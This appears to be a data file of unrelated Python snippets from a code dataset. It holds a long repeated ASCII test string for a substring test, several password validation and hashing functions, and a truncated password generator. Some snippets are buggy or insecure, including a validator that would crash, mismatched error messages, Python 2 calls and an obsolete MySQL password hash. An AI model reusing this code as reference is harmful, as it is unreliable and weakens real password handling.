abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def valid_pw(password, h):\n salt = h.split(',')[0]\n return h == make_pw_hash(password, salt)", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def old_password (string):\n\t\n\treturn hexdigest_mySQL41prior (string)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def password_validator(password):\n if list(PUNCTUATIONS) in password:\n \"\"\"\n >>> list(string.punctuation)\n ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.',\n '/', ':', ';', '<', '=', '>', '?', '@', '[', '\\\\', ']', '^', '_', '`',\n '{', '|', '}', '~']\n >>>\n \"\"\"\n return False\n else:\n return True", "def is_valid_password_v1(password):\n letter_count = sum([x == password[\"letter\"] for x in list(password[\"password\"])])\n return password[\"low\"] <= letter_count <= password[\"high\"]", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def is_valid_password(password, username):\n 
import string\n if len(password) < 4 or ' ' in password:\n return False\n if username:\n if string.lower(username) in string.lower(password):\n return False\n return True", "def get_password(length: int, specials: bool = True, specials_customized: str = \"\") -> str:\n if length < 8:\n raise ValueError('The number of signs must be at least 6 characters.')\n if specials:\n len_lowercase_letters = ceil(length * 0.4)\n len_uppercase_letters = ceil(length * 0.2)\n len_digits = ceil(length * 0.3)\n len_puncts = ceil(length * 0.1)\n while sum([len_lowercase_letters, len_uppercase_letters, len_digits, len_puncts]) > length:\n len_lowercase_letters -= 1\n lower_letters = choices(ascii_lowercase, k=len_lowercase_letters)\n upper_letters = choices(ascii_uppercase, k=len_uppercase_letters)\n digits_ = choices(digits, k=len_digits)\n if not specials_customized:\n puncts = choices(punctuation, k=len_puncts)\n else:\n puncts = choices(specials_customized, k=len_puncts)\n else:\n len_lowercase_letters = ceil(length * 0.5)\n len_uppercase_letters = ceil(length * 0.2)\n len_digits = ceil(length * 0.3)\n while sum([len_lowercase_letters, len_uppercase_letters, len_digits]) > length:\n len_lowercase_letters -= 1\n lower_letters = choices(ascii_lowercase, k=len_lowercase_letters)\n upper_letters = choices(ascii_uppercase, 